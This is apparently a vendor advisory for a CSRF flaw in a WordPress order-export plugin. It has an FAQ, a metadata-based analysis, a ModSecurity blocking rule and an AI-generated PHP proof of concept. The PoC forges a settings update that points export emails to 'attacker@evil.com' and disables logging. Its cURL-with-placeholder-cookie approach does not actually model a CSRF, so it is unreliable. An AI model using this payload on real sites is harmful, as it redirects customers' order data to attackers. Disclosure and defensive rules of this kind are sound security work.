What is CVE-2026-4140?

CVE-2026-4140 is a Cross-Site Request Forgery (CSRF) vulnerability affecting the Ni WooCommerce Order Export plugin for WordPress, specifically in versions up to and including 3.1.6. It allows unauthenticated attackers to modify plugin settings by tricking an authenticated administrator into executing a forged request.

How does CVE-2026-4140 work?

The vulnerability arises from missing nonce validation in the ni_order_export_action AJAX handler. When the ‘page’ parameter is set to ‘nioe-order-settings’, the handler processes settings updates without verifying the request’s authenticity, allowing attackers to exploit this oversight.

Who is affected by this vulnerability?

All users of the Ni WooCommerce Order Export plugin version 3.1.6 and earlier are affected. This includes any WordPress site that has the plugin installed and active, especially those with administrators who may be tricked into clicking malicious links.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Ni WooCommerce Order Export plugin installed. If it is version 3.1.6 or earlier, your site is at risk. Additionally, review your site’s logs for any unauthorized changes to plugin settings.

What are the practical implications of the CVSS score of 4.3?

The CVSS score of 4.3 indicates a medium severity level, suggesting that while the vulnerability does not directly compromise confidentiality, it can lead to integrity issues. Attackers could alter plugin settings, which may have downstream effects on site functionality or security.

How can I mitigate the risk associated with this vulnerability?

To mitigate this vulnerability, immediately update the Ni WooCommerce Order Export plugin to the latest version that addresses the issue. If an update is not available, consider disabling the plugin or replacing it with a more secure alternative.

What should I do if I cannot update the plugin?

If you cannot update the plugin, you should disable it to prevent potential exploitation. Additionally, monitor your site for any suspicious activity and consider implementing security measures such as a web application firewall.

What is nonce validation and why is it important?

Nonce validation is a security measure used in WordPress to verify that a request is legitimate and comes from a trusted source. It helps prevent CSRF attacks by ensuring that only authorized users can perform certain actions, thus protecting sensitive operations.

How does the proof of concept demonstrate the vulnerability?

The proof of concept illustrates how an attacker can craft a malicious request that targets the vulnerable AJAX handler. By sending a specially formatted request while an administrator is logged in, the attacker can modify the plugin’s settings without any checks in place.

What settings can be modified through this vulnerability?

The settings that can be modified include any options stored under the ‘ni_order_export_option’ key. This may affect export formats, file paths, email recipients, and other critical configurations that control the plugin’s behavior.

What are the consequences of an attack exploiting this vulnerability?

If exploited, an attacker could change plugin settings to redirect exported data, modify export file structures, or disable security features. These changes could lead to further attacks or data leaks, depending on the settings altered.

Is there a patch available for this vulnerability?

As of now, there is no patched version of the Ni WooCommerce Order Export plugin available. Users should monitor the plugin’s repository for updates and apply any available patches as soon as they are released.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : April 24, 2026

CVE-2026-4140: Ni WooCommerce Order Export <= 3.1.6 – Cross-Site Request Forgery to Settings Update via ni_order_export_action AJAX Action (ni-woocommerce-order-export)

CVE ID CVE-2026-4140

Plugin ni-woocommerce-order-export

Severity Medium (CVSS 4.3)

CWE 352

Vulnerable Version 3.1.6

Patched Version —

Disclosed April 20, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-4140 (metadata-based):
The Ni WooCommerce Order Export plugin for WordPress, up to and including version 3.1.6, contains a Cross-Site Request Forgery (CSRF) vulnerability. The flaw resides in the AJAX handler function ni_order_export_action(), which processes settings updates without verifying a nonce or checking user capabilities. This allows an attacker to trick a site administrator into executing a forged request that modifies plugin settings.

The root cause is a missing nonce check in the ni_order_export_action() AJAX handler. The description confirms that when the ‘page’ parameter is set to ‘nioe-order-settings’, the handler delegates to Ni_Order_Setting::page_ajax(), which calls update_option(‘ni_order_export_option’, $_REQUEST) without any CSRF token validation. Atomic Edge analysis infers from the CWE-352 classification that the developer likely omitted the typical WordPress nonce field (often named ‘_wpnonce’ or passed via the ‘security’ parameter) and the corresponding check using wp_verify_nonce() or check_ajax_referer(). Since no code diff is available, these conclusions are inferred from the CWE and description, not confirmed via source code.

Exploitation requires tricking an authenticated WordPress administrator into visiting a malicious link or page while logged in. The attacker crafts a request to /wp-admin/admin-ajax.php with the ‘action’ parameter set to ‘ni_order_export_action’ and the ‘page’ parameter set to ‘nioe-order-settings’, along with arbitrary settings data in the request body. A simple HTML form can be hosted on an attacker-controlled site and auto-submitted via JavaScript to trigger the CSRF attack. The specific settings that can be modified include any options stored under the ‘ni_order_export_option’ key, which may control export formats, file paths, email recipients, or other plugin behaviors.

Remediation requires implementing a nonce check in the ni_order_export_action() AJAX handler. The plugin should generate a nonce when rendering settings pages and verify it using check_ajax_referer() or wp_verify_nonce() before processing any settings updates. Additionally, a capability check (e.g., current_user_can(‘manage_options’)) should be added to ensure only administrators can modify settings. Without a patched version available, sites should consider disabling or replacing the plugin.

Impact: An unauthenticated attacker can force a site administrator to unknowingly change plugin settings. Depending on the settings available, this could lead to redirection of exported data (e.g., changing email recipients), modification of export file structures, or disabling security-relevant features. The CVSS score of 4.3 (Medium) reflects the low impact due to confidentiality not being affected, but integrity is compromised. There is no direct privilege escalation or remote code execution described, but altered settings could be leveraged in further attacks.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-4140 (metadata-based)
# This rule blocks CSRF exploitation of the Ni WooCommerce Order Export plugin by targeting the AJAX handler.
# The rule requires both the AJAX endpoint and the specific action/page parameters to be present.
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" "id:20264140,phase:2,deny,status:403,chain,msg:'CVE-2026-4140 - Ni WooCommerce Order Export CSRF to Settings Update',severity:'CRITICAL',tag:'CVE-2026-4140',tag:'wordpress',tag:'ni-woocommerce-order-export'"
SecRule ARGS_POST:action "@streq ni_order_export_action" "chain"
SecRule ARGS_POST:page "@streq nioe-order-settings" ""

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-4140 - Ni WooCommerce Order Export <= 3.1.6 - Cross-Site Request Forgery to Settings Update via ni_order_export_action AJAX Action

// This PoC demonstrates a CSRF attack that modifies plugin settings.
// Assumptions:
// 1. The target WordPress site has the vulnerable plugin installed and active.
// 2. An administrator is logged in when the crafted request is sent.
// 3. The plugin's settings are stored under the 'ni_order_export_option' option key.
// 4. The AJAX action is 'ni_order_export_action' and the settings page trigger is 'page=nioe-order-settings'.

$target_url = 'http://example.com'; // Change this to the target WordPress site URL

// Arbitrary settings payload to overwrite plugin options.
// In a real attack, these values would be crafted to achieve a specific objective.
$settings_payload = array(
    'page' => 'nioe-order-settings',
    'action' => 'ni_order_export_action',
    'ni_order_export_option' => array(
        'export_format' => 'csv',
        'email_recipient' => 'attacker@evil.com',
        'enable_logging' => 'no'
    )
);

// Initialize cURL session
$ch = curl_init();

// Set the target AJAX endpoint
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($settings_payload));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_COOKIE, 'wordpress_logged_in_xxx=admin_session_cookie'); // Attacker must provide a valid admin session cookie or use CSRF phishing

// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

// Check for success (HTTP 200 indicates the request was processed)
if ($response !== false && $http_code == 200) {
    echo "PoC: Settings update request sent successfully.n";
    echo "If an administrator was tricked into performing this action, the settings have been modified.n";
} else {
    echo "PoC: Request failed or was blocked.n";
}

curl_close($ch);
?>

Frequently Asked Questions

What is CVE-2026-4140?
Overview of the vulnerability
CVE-2026-4140 is a Cross-Site Request Forgery (CSRF) vulnerability affecting the Ni WooCommerce Order Export plugin for WordPress, specifically in versions up to and including 3.1.6. It allows unauthenticated attackers to modify plugin settings by tricking an authenticated administrator into executing a forged request.
How does CVE-2026-4140 work?
Mechanism of the attack
The vulnerability arises from missing nonce validation in the ni_order_export_action AJAX handler. When the ‘page’ parameter is set to ‘nioe-order-settings’, the handler processes settings updates without verifying the request’s authenticity, allowing attackers to exploit this oversight.
Who is affected by this vulnerability?
Identifying vulnerable users
All users of the Ni WooCommerce Order Export plugin version 3.1.6 and earlier are affected. This includes any WordPress site that has the plugin installed and active, especially those with administrators who may be tricked into clicking malicious links.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the version of the Ni WooCommerce Order Export plugin installed. If it is version 3.1.6 or earlier, your site is at risk. Additionally, review your site’s logs for any unauthorized changes to plugin settings.
What are the practical implications of the CVSS score of 4.3?
Understanding the severity rating
The CVSS score of 4.3 indicates a medium severity level, suggesting that while the vulnerability does not directly compromise confidentiality, it can lead to integrity issues. Attackers could alter plugin settings, which may have downstream effects on site functionality or security.
How can I mitigate the risk associated with this vulnerability?
Recommended actions
To mitigate this vulnerability, immediately update the Ni WooCommerce Order Export plugin to the latest version that addresses the issue. If an update is not available, consider disabling the plugin or replacing it with a more secure alternative.
What should I do if I cannot update the plugin?
Alternative measures
If you cannot update the plugin, you should disable it to prevent potential exploitation. Additionally, monitor your site for any suspicious activity and consider implementing security measures such as a web application firewall.
What is nonce validation and why is it important?
Role of nonce in security
Nonce validation is a security measure used in WordPress to verify that a request is legitimate and comes from a trusted source. It helps prevent CSRF attacks by ensuring that only authorized users can perform certain actions, thus protecting sensitive operations.
How does the proof of concept demonstrate the vulnerability?
Technical illustration of the attack
The proof of concept illustrates how an attacker can craft a malicious request that targets the vulnerable AJAX handler. By sending a specially formatted request while an administrator is logged in, the attacker can modify the plugin’s settings without any checks in place.
What settings can be modified through this vulnerability?
Potential impact on plugin configuration
The settings that can be modified include any options stored under the ‘ni_order_export_option’ key. This may affect export formats, file paths, email recipients, and other critical configurations that control the plugin’s behavior.
What are the consequences of an attack exploiting this vulnerability?
Potential outcomes of exploitation
If exploited, an attacker could change plugin settings to redirect exported data, modify export file structures, or disable security features. These changes could lead to further attacks or data leaks, depending on the settings altered.
Is there a patch available for this vulnerability?
Current status of remediation
As of now, there is no patched version of the Ni WooCommerce Order Export plugin available. Users should monitor the plugin’s repository for updates and apply any available patches as soon as they are released.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations